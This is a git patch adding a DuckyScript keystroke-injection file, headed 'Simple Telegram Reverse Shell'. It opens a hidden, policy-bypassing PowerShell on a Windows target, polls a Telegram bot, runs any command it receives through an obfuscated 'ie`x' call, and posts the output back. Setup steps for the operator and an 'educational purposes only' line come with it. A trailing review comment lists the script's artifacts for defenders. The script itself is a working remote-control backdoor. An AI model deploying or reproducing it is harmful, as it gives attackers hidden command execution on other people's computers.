From 711e9e6d1723ddfa994d33a58e34c7ebb3de891b Mon Sep 17 00:00:00 2001
From: beigeworm <93350544+beigeworm@users.noreply.github.com>
Date: Wed, 5 Jul 2023 23:40:48 +0000
Subject: [PATCH] Add files via upload
---
 OSINT/Telegram Reverse Shell.txt | 57 ++++++++++++++++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 OSINT/Telegram Reverse Shell.txt
diff --git a/OSINT/Telegram Reverse Shell.txt b/OSINT/Telegram Reverse Shell.txt
new file mode 100644
index 0000000..23eaf88
--- /dev/null
+++ b/OSINT/Telegram Reverse Shell.txt
@@ -0,0 +1,57 @@
+REM Title: Simple Telegram Reverse Shell
+REM Author: @beigeworm
+REM Description: This script connects target computer with a telegram chat to send powershell commands.
+REM Target: Windows 10,11
+
+REM SETUP INSTRUCTIONS
+REM 1. visit https://t.me/botfather and make a bot.
+REM 2. add bot api to script.
+REM 3. search for bot in top left box in telegram and start a chat then type /start.
+REM 4. add chat ID in 'CHAT_ID_HERE' for the chat bot (run this code below to find the chat id)
+REM ---------------------------------------------------
+REM $token='YOUR_TOKEN_HERE' #Replace this with your bot Token
+REM $URL='https://api.telegram.org/bot{0}' -f $Token
+REM $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop
+REM $inMessage.result.message | write-output
+REM $inMessage.result.message | get-member
+REM -----------------------------------------------------
+REM 5. Run Script on target System
+REM 6. Check telegram chat for 'waiting to connect' message.
+REM 7. this script has a feature to wait until you start the session from telegram.
+REM 8. type in the computer name from that message into telegram bot chat to connect to that computer.
+
+REM THIS SCRIPT IS A PROOF OF CONCEPT FOR EDUCATIONAL PURPOSES ONLY.
+
+REM Setup for duckyscript
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 4000
+
+STRING $Token = 'YOUR_TOKEN_HERE';$ChatID = "CHAT_ID_HERE";$PassPhrase = "$env:COMPUTERNAME";$URL='https://api.telegram.org/bot{0}' -f $Token ;$AccSesH="";$LastUmsg="";$LastmsgID="";sleep 1
+
+STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Waiting to Connect.."
+STRING ;Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";Sleep 5
+STRING ;Function IsAuth{param($CheckMessage)if (($messages.message.date -ne $LastUmsg) -and ($CheckMessage.message.text -like $PassPhrase) -and ($CheckMessage.message.from.is_bot -like $false)){$script:AccSesH="Authenticated"
+STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Session Started."
+STRING ;Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";return $messages.message.chat.id}Else{return 0}}
+
+STRING ;Function StrmFX{param($Stream)$FixRslt=@()
+STRING ;$Stream | Out-File -FilePath (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") -Force;$ReadAsArray= Get-Content -Path (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") | where {$_.length -gt 0}
+STRING ;foreach ($line in $ReadAsArray){;$ArrObj=New-Object psobject;$ArrObj | Add-Member -MemberType NoteProperty -Name "Line" -Value ($line).tostring();$FixRslt +=$ArrObj}return $FixRslt}
+
+STRING ;Function stgmsg{param($Messagetext,$ChatID)$FixedText=StrmFX -Stream $Messagetext
+STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value $FixedText.line
+STRING ;$JsonData=($Mtsend | ConvertTo-Json);Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body $JsonData -ContentType "application/json"}
+STRING ;Function rtgmsg{try{$inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop;return $inMessage.result[-1]}Catch{return "Fail"}}
+STRING ;Sleep 3;While ($true){sleep 2;$messages=rtgmsg;if($LastUmsg -like $null){$LastUmsg=$messages.message.date};if(!($AccSesH)){$CheckAuthentication=IsAuth -CheckMessage $messages}Else{
+STRING ;if(($CheckAuthentication -ne 0) -and ($messages.message.text -notlike $PassPhrase) -and ($messages.message.date -ne $LastmsgID)){try{$Result=ie`x($messages.message.text) -ErrorAction Stop;$Result
+STRING ;stgmsg -Messagetext $Result -ChatID $messages.message.chat.id}catch{stgmsg -Messagetext ($_.exception.message) -ChatID $messages.message.chat.id}Finally{$LastmsgID=$messages.message.date}}}};sleep 5;exit
+
+ENTER
\ No newline at end of file
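Review bot: The header block documents setup steps but not the artifacts this proof of concept leaves behind, which is the information a defender running it in a lab needs: a hidden `powershell -NoP -NonI -W Hidden -Exec Bypass` process, an HTTPS poll of `api.telegram.org` with the bot token embedded in the URL every 2 seconds (`While ($true){sleep 2;$messages=rtgmsg`), and `TGPSMessages.txt` written under `$env:TMP` by `StrmFX` and never deleted. Add a line after `REM Target: Windows 10,11` such as `REM Artifacts: hidden powershell.exe launched with -Exec Bypass; continuous HTTPS polling of api.telegram.org (token in URL); $env:TMP\TGPSMessages.txt left on disk` so the telemetry the script produces can be matched against detections. The `EDUCATIONAL PURPOSES ONLY` line should also state that `$Token` is a credential: the same token is used for both `/getUpdates` and `/sendMessage`, so anyone holding a copy of the file with a real token filled in can read and write that chat. The hunk is the entire new file, so nothing continues outside it.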